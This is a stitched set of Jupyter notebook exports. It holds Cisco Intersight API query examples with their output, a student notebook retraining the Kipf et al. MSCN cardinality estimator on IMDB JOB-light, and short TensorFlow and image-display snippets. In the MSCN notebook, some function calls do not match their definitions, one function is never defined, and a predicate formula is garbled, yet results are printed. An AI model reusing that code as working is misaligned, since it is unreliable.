Serial: SRV124
NumThreads: 16
7 of 15
DN: sys/chassis-3/blade-1
Model: UCSB-EX-M4-1
Serial: SRV107
NumThreads: 16
8 of 15
DN: sys/chassis-3/blade-5
Model: UCSB-EX-M4-1
Serial: SRV126
NumThreads: 16
9 of 15
DN: sys/chassis-4/blade-2
Model: UCSC-C3K-M4SRB
Serial: SRV112
NumThreads: 16
10 of 15
DN: sys/chassis-5/blade-3
Model: UCSB-B480-M5
Serial: SRV125
NumThreads: 32
11 of 15
DN: sys/chassis-3/blade-3
Model: UCSB-EX-M4-1
Serial: SRV108
NumThreads: 16
12 of 15
DN: sys/chassis-3/blade-7
Model: UCSB-EX-M4-1
Serial: SRV110
NumThreads: 16
13 of 15
DN: sys/chassis-4/blade-1
Model: UCSC-C3K-M4SRB
Serial: SRV111
NumThreads: 16
14 of 15
DN: sys/chassis-5/blade-1
Model: UCSB-B200-M5
Serial: SRV122
NumThreads: 16
15 of 15
DN: sys/chassis-5/blade-2
Model: UCSB-B200-M5
Serial: SRV124
NumThreads: 16
###Markdown
--- Pagination, skip the first N results and return only the top X remaining results
###Code
results = intersight(
method='GET',
endpoint='/compute/Blades',
params='$skip=3&$top=5'
)
# Display the results
display_results(
results=results,
fields=[
'Model',
'Serial',
'NumThreads'
]
)
###Output
HTTP response: 200 OK
Objects returned: 5
1 of 5
DN: sys/chassis-3/blade-3
Model: UCSB-EX-M4-1
Serial: SRV108
NumThreads: 16
2 of 5
DN: sys/chassis-3/blade-7
Model: UCSB-EX-M4-1
Serial: SRV110
NumThreads: 16
3 of 5
DN: sys/chassis-4/blade-1
Model: UCSC-C3K-M4SRB
Serial: SRV111
NumThreads: 16
4 of 5
DN: sys/chassis-4/blade-2
Model: UCSC-C3K-M4SRB
Serial: SRV112
NumThreads: 16
5 of 5
DN: sys/chassis-3/blade-5
Model: UCSB-EX-M4-1
Serial: SRV126
NumThreads: 16
###Markdown
--- Return objects in a certain order (select only certain properties)
###Code
results = intersight(
method='GET',
endpoint='/compute/Blades',
params='$orderby=Serial&$select=Dn,Serial,Model'
)
# Display the results
display_results(
results=results,
fields=[
'Model',
'Serial'
]
)
###Output
HTTP response: 200 OK
Objects returned: 18
1 of 18
DN: sys/chassis-3/blade-1
Model: UCSB-EX-M4-1
Serial: SRV107
2 of 18
DN: sys/chassis-3/blade-1
Model: UCSB-EX-M4-1
Serial: SRV107
3 of 18
DN: sys/chassis-3/blade-3
Model: UCSB-EX-M4-1
Serial: SRV108
4 of 18
DN: sys/chassis-3/blade-3
Model: UCSB-EX-M4-1
Serial: SRV108
5 of 18
DN: sys/chassis-3/blade-7
Model: UCSB-EX-M4-1
Serial: SRV110
6 of 18
DN: sys/chassis-3/blade-7
Model: UCSB-EX-M4-1
Serial: SRV110
7 of 18
DN: sys/chassis-4/blade-1
Model: UCSC-C3K-M4SRB
Serial: SRV111
8 of 18
DN: sys/chassis-4/blade-1
Model: UCSC-C3K-M4SRB
Serial: SRV111
9 of 18
DN: sys/chassis-4/blade-2
Model: UCSC-C3K-M4SRB
Serial: SRV112
10 of 18
DN: sys/chassis-4/blade-2
Model: UCSC-C3K-M4SRB
Serial: SRV112
11 of 18
DN: sys/chassis-5/blade-1
Model: UCSB-B200-M5
Serial: SRV122
12 of 18
DN: sys/chassis-5/blade-1
Model: UCSB-B200-M5
Serial: SRV122
13 of 18
DN: sys/chassis-5/blade-2
Model: UCSB-B200-M5
Serial: SRV124
14 of 18
DN: sys/chassis-5/blade-2
Model: UCSB-B200-M5
Serial: SRV124
15 of 18
DN: sys/chassis-5/blade-3
Model: UCSB-B480-M5
Serial: SRV125
16 of 18
DN: sys/chassis-5/blade-3
Model: UCSB-B480-M5
Serial: SRV125
17 of 18
DN: sys/chassis-3/blade-5
Model: UCSB-EX-M4-1
Serial: SRV126
18 of 18
DN: sys/chassis-3/blade-5
Model: UCSB-EX-M4-1
Serial: SRV126
###Markdown
--- Return only a count of the matching objects, no objects or their properties
###Code
results = intersight(
method='GET',
endpoint='/compute/Blades',
params='$count=true'
)
# Display the results
print(f'Total matching objects: {results.get("Count")}')
###Output
HTTP response: 200 OK
Objects returned: 1
Total matching objects: 18
###Markdown
--- Return a count of matching objects with objects and their properties
###Code
results = intersight(
method='GET',
endpoint='/compute/Blades',
params='$inlinecount=allpages&$select=Dn,Model,Serial'
)
# Display the results
print(f'Total matching objects: {results.get("Count")}\n')
display_results(
results=results,
fields=[
'Model',
'Serial',
'NumThreads'
]
)
###Output
HTTP response: 200 OK
Objects returned: 18
Total matching objects: 18
1 of 18
DN: sys/chassis-5/blade-1
Model: UCSB-B200-M5
Serial: SRV122
NumThreads: N/A
2 of 18
DN: sys/chassis-5/blade-3
Model: UCSB-B480-M5
Serial: SRV125
NumThreads: N/A
3 of 18
DN: sys/chassis-3/blade-1
Model: UCSB-EX-M4-1
Serial: SRV107
NumThreads: N/A
4 of 18
DN: sys/chassis-3/blade-3
Model: UCSB-EX-M4-1
Serial: SRV108
NumThreads: N/A
5 of 18
DN: sys/chassis-3/blade-7
Model: UCSB-EX-M4-1
Serial: SRV110
NumThreads: N/A
6 of 18
DN: sys/chassis-4/blade-1
Model: UCSC-C3K-M4SRB
Serial: SRV111
NumThreads: N/A
7 of 18
DN: sys/chassis-4/blade-2
Model: UCSC-C3K-M4SRB
Serial: SRV112
NumThreads: N/A
8 of 18
DN: sys/chassis-3/blade-5
Model: UCSB-EX-M4-1
Serial: SRV126
NumThreads: N/A
9 of 18
DN: sys/chassis-5/blade-2
Model: UCSB-B200-M5
Serial: SRV124
NumThreads: N/A
10 of 18
DN: sys/chassis-3/blade-1
Model: UCSB-EX-M4-1
Serial: SRV107
NumThreads: N/A
11 of 18
DN: sys/chassis-3/blade-5
Model: UCSB-EX-M4-1
Serial: SRV126
NumThreads: N/A
12 of 18
DN: sys/chassis-4/blade-2
Model: UCSC-C3K-M4SRB
Serial: SRV112
NumThreads: N/A
13 of 18
DN: sys/chassis-5/blade-3
Model: UCSB-B480-M5
Serial: SRV125
NumThreads: N/A
14 of 18
DN: sys/chassis-3/blade-3
Model: UCSB-EX-M4-1
Serial: SRV108
NumThreads: N/A
15 of 18
DN: sys/chassis-3/blade-7
Model: UCSB-EX-M4-1
Serial: SRV110
NumThreads: N/A
16 of 18
DN: sys/chassis-4/blade-1
Model: UCSC-C3K-M4SRB
Serial: SRV111
NumThreads: N/A
17 of 18
DN: sys/chassis-5/blade-1
Model: UCSB-B200-M5
Serial: SRV122
NumThreads: N/A
18 of 18
DN: sys/chassis-5/blade-2
Model: UCSB-B200-M5
Serial: SRV124
NumThreads: N/A
###Markdown
--- Group objects by properties and aggregate results by values- Group all servers by Model and display the average number of CPUs per model.- Supported aggregates include: - min, max, average, and sum
###Code
results = intersight(
method='GET',
endpoint='/compute/Blades',
params='$apply=groupby((Model), aggregate(NumCpus with average as AverageCpuCount))'
)
# Display the results
display_results(
results=results,
fields=[
'Model',
'AverageCpuCount'
]
)
###Output
HTTP response: 200 OK
Objects returned: 4
1 of 4
DN: N/A
Model: UCSB-B200-M5
AverageCpuCount: 2
2 of 4
DN: N/A
Model: UCSB-B480-M5
AverageCpuCount: 4
3 of 4
DN: N/A
Model: UCSB-EX-M4-1
AverageCpuCount: 2
4 of 4
DN: N/A
Model: UCSC-C3K-M4SRB
AverageCpuCount: 2
###Markdown
--- Group objects by the total count of a value- Group all servers by Model and display the total number of servers for each Model.
###Code
results = intersight(
method='GET',
endpoint='/compute/Blades',
params='$apply=groupby((Model), aggregate($count as TotalCountOfServerModel))'
)
display_results(
results=results,
fields=[
'Model',
'TotalCountOfServerModel'
]
)
###Output
HTTP response: 200 OK
Objects returned: 4
1 of 4
DN: N/A
Model: UCSC-C3K-M4SRB
TotalCountOfServerModel: 4
2 of 4
DN: N/A
Model: UCSB-EX-M4-1
TotalCountOfServerModel: 8
3 of 4
DN: N/A
Model: UCSB-B480-M5
TotalCountOfServerModel: 2
4 of 4
DN: N/A
Model: UCSB-B200-M5
TotalCountOfServerModel: 4
###Markdown
--- Sort grouped objects with the `$orderby` parameter (using the `desc` keyword as an example)- Group all servers by Model and display the total number of servers for each Model.
###Code
results = intersight(
method='GET',
endpoint='/compute/Blades',
params='$apply=groupby((Model), aggregate($count as TotalCountOfServerModel))&$orderby=TotalCountOfServerModel desc'
)
# Display the results
display_results(
results=results,
fields=[
'Model',
'TotalCountOfServerModel'
]
)
###Output
HTTP response: 200 OK
Objects returned: 4
1 of 4
DN: N/A
Model: UCSB-EX-M4-1
TotalCountOfServerModel: 8
2 of 4
DN: N/A
Model: UCSB-B200-M5
TotalCountOfServerModel: 4
3 of 4
DN: N/A
Model: UCSC-C3K-M4SRB
TotalCountOfServerModel: 4
4 of 4
DN: N/A
Model: UCSB-B480-M5
TotalCountOfServerModel: 2
###Markdown
--- Include related resources with the queried resources
###Code
results = intersight(
method='GET',
endpoint='/compute/Blades',
params='$expand=Parent'
)
# Display the results
result_sample = results.get('Results')[0]
print(f'Dn: {result_sample["Dn"]}')
print(f'Parent Dn: {result_sample["Parent"].get("Dn")}')
###Output
HTTP response: 200 OK
Objects returned: 18
Dn: sys/chassis-5/blade-1
Parent Dn: sys/chassis-5
###Markdown
--- Search for resources- Allows the use of `$top`, `$skip`, `$orderby`, `$filter`, `$select`, & `$count`
###Code
results = intersight(
method='GET',
endpoint='/search/SearchItems',
# Single quotes required on the search string
# Outer double quotes will work also, without escaping inner single quotes
params='$filter=endswith(Dn,\'5\')'
)
# Display the results
display_results(
results=results,
fields=[
'ObjectType',
'EpDn',
'Serial',
'TotalMemory'
]
)
###Output
HTTP response: 200 OK
Objects returned: 50
1 of 50
DN: sys/chassis-3/blade-5
ObjectType: compute.PhysicalSummary
EpDn: N/A
Serial: SRV126
TotalMemory: 49152
2 of 50
DN: sys/rack-unit-5
ObjectType: compute.PhysicalSummary
EpDn: N/A
Serial: RK58
TotalMemory: 49152
3 of 50
DN: sys/rack-unit-5
ObjectType: compute.RackUnit
EpDn: N/A
Serial: RK58
TotalMemory: 49152
4 of 50
DN: sys/chassis-3/blade-5
ObjectType: compute.Blade
EpDn: N/A
Serial: SRV126
TotalMemory: 49152
5 of 50
DN: sys/chassis-3/blade-3/adaptor-1/ext-eth-5
ObjectType: adapter.ExtEthInterface
EpDn: sys/chassis-3/blade-3/fabric-B/pc-1287
Serial: N/A
TotalMemory: N/A
6 of 50
DN: sys/chassis-5/blade-1/adaptor-2/ext-eth-5
ObjectType: adapter.ExtEthInterface
EpDn: sys/chassis-5/blade-1/fabric-B/pc-1305
Serial: N/A
TotalMemory: N/A
7 of 50
DN: sys/chassis-3/blade-7/adaptor-2/ext-eth-5
ObjectType: adapter.ExtEthInterface
EpDn: sys/chassis-3/blade-7/fabric-B/pc-1284
Serial: N/A
TotalMemory: N/A
8 of 50
DN: sys/chassis-5/blade-3/adaptor-1/ext-eth-5
ObjectType: adapter.ExtEthInterface
EpDn: sys/chassis-5/blade-3/fabric-B/pc-1308
Serial: N/A
TotalMemory: N/A
9 of 50
DN: sys/chassis-5/blade-1/adaptor-1/ext-eth-5
ObjectType: adapter.ExtEthInterface
EpDn: sys/chassis-5/blade-1/fabric-B/pc-1304
Serial: N/A
TotalMemory: N/A
10 of 50
DN: sys/chassis-5/blade-2/adaptor-2/ext-eth-5
ObjectType: adapter.ExtEthInterface
EpDn: sys/chassis-5/blade-2/fabric-B/pc-1301
Serial: N/A
TotalMemory: N/A
11 of 50
DN: sys/chassis-5/blade-2/adaptor-1/ext-eth-5
ObjectType: adapter.ExtEthInterface
EpDn: sys/chassis-5/blade-2/fabric-B/pc-1300
Serial: N/A
TotalMemory: N/A
12 of 50
DN: sys/chassis-3/blade-1/adaptor-2/ext-eth-5
ObjectType: adapter.ExtEthInterface
EpDn: sys/chassis-3/blade-1/fabric-B/pc-1293
Serial: N/A
TotalMemory: N/A
13 of 50
DN: sys/chassis-3/blade-5/adaptor-1/ext-eth-5
ObjectType: adapter.ExtEthInterface
EpDn: sys/chassis-3/blade-5/fabric-B/pc-1280
Serial: N/A
TotalMemory: N/A
14 of 50
DN: sys/chassis-5/blade-3/adaptor-2/ext-eth-5
ObjectType: adapter.ExtEthInterface
EpDn: sys/chassis-5/blade-3/fabric-B/pc-1309
Serial: N/A
TotalMemory: N/A
15 of 50
DN: sys/chassis-3/blade-3/adaptor-2/ext-eth-5
ObjectType: adapter.ExtEthInterface
EpDn: sys/chassis-3/blade-3/fabric-B/pc-1288
Serial: N/A
TotalMemory: N/A
16 of 50
DN: sys/chassis-3/blade-5/adaptor-2/ext-eth-5
ObjectType: adapter.ExtEthInterface
EpDn: sys/chassis-3/blade-5/fabric-B/pc-1281
Serial: N/A
TotalMemory: N/A
17 of 50
DN: sys/chassis-3/blade-1/adaptor-1/ext-eth-5
ObjectType: adapter.ExtEthInterface
EpDn: sys/chassis-3/blade-1/fabric-B/pc-1292
Serial: N/A
TotalMemory: N/A
18 of 50
DN: sys/rack-unit-5
ObjectType: compute.PhysicalSummary
EpDn: N/A
Serial: RK58
TotalMemory: 49152
19 of 50
DN: sys/rack-unit-5
ObjectType: compute.RackUnit
EpDn: N/A
Serial: RK58
TotalMemory: 49152
20 of 50
DN: sys/chassis-3/blade-5
ObjectType: compute.PhysicalSummary
EpDn: N/A
Serial: SRV126
TotalMemory: 49152
21 of 50
DN: sys/chassis-5
ObjectType: equipment.Chassis
EpDn: N/A
Serial: CH42
TotalMemory: N/A
22 of 50
DN: sys/chassis-3/blade-5
ObjectType: compute.Blade
EpDn: N/A
Serial: SRV126
TotalMemory: 49152
23 of 50
DN: sys/chassis-4/enc-1/disk-25
ObjectType: storage.PhysicalDisk
EpDn: N/A
Serial: CHDISK694
TotalMemory: N/A
24 of 50
DN: sys/chassis-4/enc-1/disk-5
ObjectType: storage.PhysicalDisk
EpDn: N/A
Serial: CHDISK674
TotalMemory: N/A
25 of 50
DN: sys/chassis-4/enc-1/disk-35
ObjectType: storage.PhysicalDisk
EpDn: N/A
Serial: CHDISK704
TotalMemory: N/A
26 of 50
DN: sys/chassis-4/enc-1/disk-15
ObjectType: storage.PhysicalDisk
EpDn: N/A
Serial: CHDISK684
TotalMemory: N/A
27 of 50
DN: sys/chassis-4/enc-1/disk-45
ObjectType: storage.PhysicalDisk
EpDn: N/A
Serial: CHDISK714
TotalMemory: N/A
28 of 50
DN: sys/chassis-4/enc-1/disk-55
ObjectType: storage.PhysicalDisk
EpDn: N/A
Serial: CHDISK724
TotalMemory: N/A
29 of 50
DN: sys/rack-unit-9/board/storage-SAS-1/disk-5
ObjectType: storage.PhysicalDisk
EpDn: N/A
Serial: RKDISK476
TotalMemory: N/A
30 of 50
DN: sys/rack-unit-10/board/storage-SAS-1/disk-5
ObjectType: storage.PhysicalDisk
EpDn: N/A
Serial: RKDISK493
TotalMemory: N/A
31 of 50
DN: sys/rack-unit-6/equipped-slot-5
ObjectType: pci.Device
EpDn: N/A
Serial: RKCTLR79
TotalMemory: N/A
32 of 50
DN: sys/rack-unit-7/board/memarray-1/mem-5
ObjectType: memory.Unit
EpDn: N/A
Serial:
TotalMemory: N/A
33 of 50
DN: sys/rack-unit-3/board/memarray-1/mem-45
ObjectType: memory.Unit
EpDn: N/A
Serial:
TotalMemory: N/A
34 of 50
DN: sys/chassis-4/blade-1/board/memarray-1/mem-15
ObjectType: memory.Unit
EpDn: N/A
Serial: SRVMEM2465
TotalMemory: N/A
35 of 50
DN: sys/chassis-4/blade-2/board/memarray-1/mem-15
ObjectType: memory.Unit
EpDn: N/A
Serial: SRVMEM2481
TotalMemory: N/A
36 of 50
DN: sys/rack-unit-3/board/memarray-1/mem-5
ObjectType: memory.Unit
EpDn: N/A
Serial:
TotalMemory: N/A
37 of 50
DN: sys/rack-unit-3/board/memarray-1/mem-25
ObjectType: memory.Unit
EpDn: N/A
Serial:
TotalMemory: N/A
38 of 50
DN: sys/rack-unit-4/board/memarray-1/mem-5
ObjectType: memory.Unit
EpDn: N/A
Serial:
TotalMemory: N/A
39 of 50
DN: sys/rack-unit-2/board/memarray-1/mem-5
ObjectType: memory.Unit
EpDn: N/A
Serial:
TotalMemory: N/A
40 of 50
DN: sys/chassis-3/blade-3/board/memarray-1/mem-25
ObjectType: memory.Unit
EpDn: N/A
Serial: SRVMEM2347
TotalMemory: N/A
41 of 50
DN: sys/rack-unit-10/board/memarray-1/mem-15
ObjectType: memory.Unit
EpDn: N/A
Serial:
TotalMemory: N/A
42 of 50
DN: sys/chassis-3/blade-3/board/memarray-1/mem-15
ObjectType: memory.Unit
EpDn: N/A
Serial: SRVMEM2337
TotalMemory: N/A
43 of 50
DN: sys/chassis-5/blade-3/board/memarray-1/mem-45
ObjectType: memory.Unit
EpDn: N/A
Serial: SRVMEM2787
TotalMemory: N/A
44 of 50
DN: sys/rack-unit-6/board/memarray-1/mem-5
ObjectType: memory.Unit
EpDn: N/A
Serial: RKMEM1889
TotalMemory: N/A
45 of 50
DN: sys/rack-unit-8/board/memarray-1/mem-15
ObjectType: memory.Unit
EpDn: N/A
Serial:
TotalMemory: N/A
46 of 50
DN: sys/rack-unit-3/board/memarray-1/mem-15
ObjectType: memory.Unit
EpDn: N/A
Serial:
TotalMemory: N/A
47 of 50
DN: sys/chassis-5/blade-3/board/memarray-1/mem-35
ObjectType: memory.Unit
EpDn: N/A
Serial: SRVMEM2777
TotalMemory: N/A
48 of 50
DN: sys/chassis-4/blade-1/board/memarray-1/mem-5
ObjectType: memory.Unit
EpDn: N/A
Serial: SRVMEM2455
TotalMemory: N/A
49 of 50
DN: sys/rack-unit-4/board/memarray-1/mem-15
ObjectType: memory.Unit
EpDn: N/A
Serial:
TotalMemory: N/A
50 of 50
DN: sys/rack-unit-10/board/memarray-1/mem-5
ObjectType: memory.Unit
EpDn: N/A
Serial:
TotalMemory: N/A
|
notebooks/3-Cardinality_Models.ipynb | ###Markdown
3 - Overcoming SOTA Performance On IMDB With JOB-Light*By Marcus Schwarting and Andronicus Samsundar Rajasukumar*In this notebook, we will:- Introduce the Kipf et. al. model that we wish to improve upon- Show various implementations of featurization routines, and discuss their pros and cons- Discuss changes to the Kipf implementation that yielded overall improvements in accuracy and training timeThe performance benchmark that we wish to beat, as described in the literature on the JOB-light test query set on the IMDB dataset, is as follows:| Metric | Value || ---- | ---- ||Median | 3.82||90th Percentile| 78.4||95th Percentile|362||Max|1110||Mean|57.9|
###Code
#MODIFIED VERSION OF KIPF ET AL CODE (originally from https://github.com/andreaskipf/learnedcardinalities)#
import time
import os
import torch
from torch.autograd import Variable
from torch.utils.data import DataLoader
from mscn.util import *
from mscn.data import get_train_datasets, load_data, make_dataset
from mscn.model import SetConv
###Output
_____no_output_____
###Markdown
Introducing Kipf MSCN ModelThe authors achieve the above benchmark performance by using a multi-set convolutional network (MSCN). We have re-implemented their methods with some changes that have marginally improved on the state of the art. Below we re-use some of their code infrastructure and point out important changes where they are applicable.
###Code
def unnormalize_torch(vals, min_val, max_val):
#Read from "imdb_max_min.csv"
vals = (vals * (max_val - min_val)) + min_val
return torch.exp(vals)
def qerror_loss(preds, targets, min_val, max_val):
#Returns Q-error, can also return MAE as desired.
qerror = []
preds = unnormalize_torch(preds, min_val, max_val)
targets = unnormalize_torch(targets, min_val, max_val)
for i in range(len(targets)):
if (preds[i] > targets[i]).cpu().data.numpy()[0]:
qerror.append(preds[i] / targets[i])
else:
qerror.append(targets[i] / preds[i])
return torch.mean(torch.cat(qerror))
def predict(model, data_loader):
#The workhorse. Evaluates the final model and runs predictions.
preds = []
t_total = 0.
model.eval()
for batch_idx, data_batch in enumerate(data_loader):
samples, predicates, joins, targets, sample_masks, predicate_masks, join_masks = data_batch
t = time.time()
outputs = model(samples, predicates, joins, sample_masks, predicate_masks, join_masks)
t_total += time.time() - t
for i in range(outputs.data.shape[0]):
preds.append(outputs.data[i])
return preds, t_total
def print_qerror(preds_unnorm, labels_unnorm):
qerror = []
for i in range(len(preds_unnorm)):
if preds_unnorm[i] > float(labels_unnorm[i]):
qerror.append(preds_unnorm[i] / float(labels_unnorm[i]))
else:
qerror.append(float(labels_unnorm[i]) / float(preds_unnorm[i]))
print(f"Median: {np.median(qerror)}")
print(f"90th percentile: {np.percentile(qerror, 90)}")
print(f"95th percentile: {np.percentile(qerror, 95)}")
print(f"99th percentile: {np.percentile(qerror, 99)}")
print(f"Max: {np.max(qerror)}")
print(f"Mean: {np.mean(qerror)}")
def train_and_predict(workload_name, num_queries=1000, num_epochs=100, \
batch_size=100, hid_units=256, verbose=False,write=False):
# Load training and validation data
num_materialized_samples = 1000
dicts, column_min_max_vals, min_val, max_val, labels_train, \
labels_test, max_num_joins, max_num_predicates, \
train_data, test_data = get_train_datasets('all_train_queries.sql', num_queries, \
num_materialized_samples)
table2vec, column2vec, op2vec, join2vec = dicts
# Train model
sample_feats = len(table2vec) + num_materialized_samples
predicate_feats = len(column2vec) + len(op2vec) + 1
join_feats = len(join2vec)
model = SetConv(sample_feats, predicate_feats, join_feats, hid_units)
optimizer = torch.optim.Adam(model.parameters(), lr=0.005) #lr=0.001 originally
train_data_loader = DataLoader(train_data, batch_size=batch_size)
test_data_loader = DataLoader(test_data, batch_size=batch_size)
model.train()
for epoch in range(num_epochs):
loss_total = 0.
for batch_idx, data_batch in enumerate(train_data_loader):
samples, predicates, joins, targets, sample_masks, predicate_masks, join_masks = data_batch
optimizer.zero_grad()
outputs = model(samples, predicates, joins, sample_masks, predicate_masks, join_masks)
loss = qerror_loss(outputs, targets.float(), min_val, max_val)
loss_total += loss.item()
loss.backward()
optimizer.step()
if verbose:
print("Epoch {}, loss: {}".format(epoch, loss_total / len(train_data_loader)))
# Get final training and validation set predictions
preds_train, t_total = predict(model, train_data_loader)
if verbose:
print("Prediction time per training sample: {}".format(t_total / len(labels_train) * 1000))
preds_test, t_total = predict(model, test_data_loader)
if verbose:
print("Prediction time per validation sample: {}".format(t_total / len(labels_test) * 1000))
# Unnormalize
preds_train_unnorm = unnormalize_labels(preds_train, min_val, max_val)
labels_train_unnorm = unnormalize_labels(labels_train, min_val, max_val)
preds_test_unnorm = unnormalize_labels(preds_test, min_val, max_val)
labels_test_unnorm = unnormalize_labels(labels_test, min_val, max_val)
# Print metrics
if verbose:
print("\nQ-Error training set:")
print_qerror(preds_train_unnorm, labels_train_unnorm)
print("\nQ-Error validation set:")
print_qerror(preds_test_unnorm, labels_test_unnorm)
print("")
# Load test data
file_name = "workloads/" + workload_name
joins, predicates, tables, samples, label = load_data(file_name, num_materialized_samples)
# Get feature encoding and proper normalization
samples_test = encode_samples(tables, samples, table2vec)
predicates_test, joins_test = encode_data(predicates, joins, column_min_max_vals, column2vec, op2vec, join2vec)
labels_test, _, _ = normalize_labels(label, min_val, max_val)
if verbose:
print(f"Number of test samples: {len(labels_test)}")
max_num_predicates = max([len(p) for p in predicates_test])
max_num_joins = max([len(j) for j in joins_test])
# Get test set predictions
test_data = make_dataset(samples_test, predicates_test, joins_test, labels_test, max_num_joins, max_num_predicates)
test_data_loader = DataLoader(test_data, batch_size=batch_size)
preds_test, t_total = predict(model, test_data_loader)
if verbose:
print(f"Prediction time per test sample: {t_total / len(labels_test) * 1000}")
# Unnormalize
preds_test_unnorm = unnormalize_labels(preds_test, min_val, max_val)
# Print metrics
print(f"\nQ-Error, {workload_name}:")
print_qerror(preds_test_unnorm, label)
# Write predictions
if write:
file_name = f"results/predictions_{workload_name}.csv"
os.makedirs(os.path.dirname(file_name), exist_ok=True)
with open(file_name, "w") as f:
for i in range(len(preds_test_unnorm)):
f.write(f'{preds_test_unnorm[i]},{label[i]}\n')
print('Original (recreated and retrained) MSCN from Kipf et. al.:\n')
start_time = time.time()
train_and_predict(testset='job-light', num_queries=5000, epochs=1000, batch_size=100, hid=256)
print(f'Total Time: {round((time.time()-start_time),4)} seconds')
###Output
Original (recreated and retrained) MSCN from Kipf et. al.:
Q-Error, job-light:
Median: 3.829080001743435
90th percentile: 79.58870873669316
95th percentile: 381.1589145561346
99th percentile: 937.5885201549474
Max: 1271.7475329481463
Mean: 44.07001456032248
Total Time: 217.4167 seconds
###Markdown
Adjusted Data EncodingBelow shows the difference between the original MSCN implementation of predicate data encoding versus our featurized predicate encoding.
###Code
#### THE ORIGINAL CODE IS AVAILABLE FROM KIPF ET AL, mscn/utils.py ####
def encode_data(predicates, joins, column_min_max_vals, column2vec, op2vec, join2vec):
predicates_enc = []
joins_enc = []
for i, query in enumerate(predicates):
predicates_enc.append(list())
joins_enc.append(list())
for predicate in query:
if len(predicate) == 3:
# Proper predicate
column = predicate[0]
operator = predicate[1]
val = predicate[2]
norm_val = normalize_data(val, column, column_min_max_vals)
pred_vec = []
pred_vec.append(column2vec[column])
pred_vec.append(op2vec[operator])
pred_vec.append(norm_val)
pred_vec = np.hstack(pred_vec)
else:
pred_vec = np.zeros((len(column2vec) + len(op2vec) + 1))
predicates_enc[i].append(pred_vec)
predicates_enc[i] = predicates_enc[i].flatten()
for predicate in joins[i]:
# Join instruction
join_vec = join2vec[predicate]
joins_enc[i].append(join_vec)
return predicates_enc, joins_enc
#### OUR UPDATES TO KIPF ET AL DATA ENCODING SCHEMA ####
def encode_data_NEW(predicates, joins, column_min_max_vals, column2vec, op2vec, join2vec):
predicates_enc = []
joins_enc = []
for i, query in enumerate(predicates):
predicates_enc.append(list())
joins_enc.append(list())
for predicate in query:
column = predicate[0]
operator = predicate[1]
val = predicate[2]
norm_val = normalize_data(val, column, column_min_max_vals)
#MAJOR FEATURIZATION CHANGES HERE
col_onehot = column2vec[column]
oper_onehot = op2vec[operator]
pred_vec = np.zeros(len(col_onehot)*len(oper_onehot))
for j in range(len(col_onehot)):
if col_onehot==1:
pred_vec[3*j:3*j+3]=oper_onehot*norm_val
predicates_enc[i].append(pred_vec)
for predicate in joins[i]:
# Join instruction
join_vec = join2vec[predicate]
joins_enc[i].append(join_vec)
return predicates_enc, joins_enc
###Output
_____no_output_____
###Markdown
Predicate Encoding Scheme ComparisonOur main insight on improving the featurization is as follows. Suppose I have a query with the following predicates:$$(b0.2) \wedge (e=0.3)$$on some set of predicates $\{a,b,c,d,e\}$ where we assume each normalized attribute ranges between $[0,1]$.Assuming an upward limit of four predicates, the Kipf implementation would featurize this predicate set as follows:```(Predicate on a)[0 1 0 0 0 1 0 0 0.5] a b c d e = val -- AND --(Predicate on d)[0 0 0 1 0 0 1 0 0.2] a b c d e = val -- AND --(Predicate on e)[0 0 0 0 1 0 0 1 0.3] a b c d e = valFINAL REPRESENTATION (assuming a four predicate maximum):[0 1 0 0 0 1 0 0 0.5 0 0 0 1 0 0 1 0 0.2 0 0 0 0 1 0 0 1 0.3 0 0 0 0 0 0 0 0 0]Final Length of Predicate Featurization: 36(average of 7.2 values per table attribute)```By contrast, we choose to featurize this predicate set as follows:```[0 0 0 0.5 0 0 0 0 0 0 0.2 0 0 0 0.3 ] Final Featurization = = = = = Equality Operators a b c d e VariablesFINAL REPRESENTATION:[0 0 0 0.5 0 0 0 0 0 0 0.2 0 0 0 0.3]Final Length of Predicate Featurization: 15(constant average of 3 values per table attribute)```There are a number of benefits to this featurization. First, there is no upward limit on the number of predicates that can be placed in a query. The predicate featurization length has no dependence on the number of predicates in a query. There is also no order dependence; that is, presumably$$[\color{green}{\text{0, 1, 0, 0, 0, 1, 0, 0, 0.5,}} \color{red}{\text{0, 0, 0, 1, 0, 0, 1, 0, 0.2,}} 0, 0, 0, 0, 1, 0, 0, 1, 0.3, 0, 0, 0, 0, 0, 0, 0, 0, 0]$$and $$[ \color{red}{\text{0, 0, 0, 1, 0, 0, 1, 0, 0.2,}} \color{green}{\text{0, 1, 0, 0, 0, 1, 0, 0, 0.5,}} 0, 0, 0, 0, 1, 0, 0, 1, 0.3, 0, 0, 0, 0, 0, 0, 0, 0, 0]$$should map to an identical cardinality, and indeed be identical queries (we have merely switched the order of predicate operations), but have very different predicate featurized representations. It would appear that the MSCN is not flexible enough to recognize this difference. Even when aggregating over sets of predicates (as the MSCN can be adjusted to do), the improved predicate featurization still out-performs the previous implementation.
###Code
print('Retrained MSCN Architecture with Updated Featurization:\n')
start_time = time.time()
#Note: We use this altered function on the back end with other utis, and integrate accordingly.
train_and_predict_NEW(testset='job-light', num_queries=5000, epochs=1000, batch_size=100, hid=256)
print(f'Total Time: {round((time.time()-start_time),4)} seconds')
###Output
Retrained MSCN Architecture with Updated Featurization:
Q-Error job-light:
Median: 3.3707934686744982
90th percentile: 44.26868661918655
95th percentile: 197.39683996127513
99th percentile: 782.6566606666486
Max: 954.0733123971569
Mean: 41.41337581462835
Total Time: 210.5493 seconds
|
tfsimple.ipynb | ###Markdown
Simple Tensorflow image classification
###Code
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
import time
import data_helpers
beginTime = time.time()
# Parameter definitions
batch_size = 100
learning_rate = 0.005
max_steps = 1000
# Uncommenting this line removes randomness
# You'll get exactly the same result on each run
# np.random.seed(1)
# Prepare data
data_sets = data_helpers.load_data()
###Output
_____no_output_____ |
examples/.ipynb_checkpoints/imaging_and_gui-checkpoint.ipynb | ###Markdown
Snap
###Code
# test image stack
arr = []
for i in range(50):
b = np.random.rand(500,500)
b= (b*(2**16-1)).astype('uint16')
arr.append(b)
# snap (MPL)
button = widgets.Button(description='Snap')
display.display(button)
def on_button_clicked(b):
img=arr.pop()
plt.imshow(img, cmap='gray')
display.clear_output(wait=True)
display.display(plt.gcf())
button.on_click(on_button_clicked)
# snap (CV2)
button = widgets.Button(description='Snap')
display.display(button)
def on_button_clicked(b):
img=arr.pop()
cv2.imshow('Video',img)
cv2.waitKey(30)
button.on_click(on_button_clicked)
###Output
_____no_output_____
###Markdown
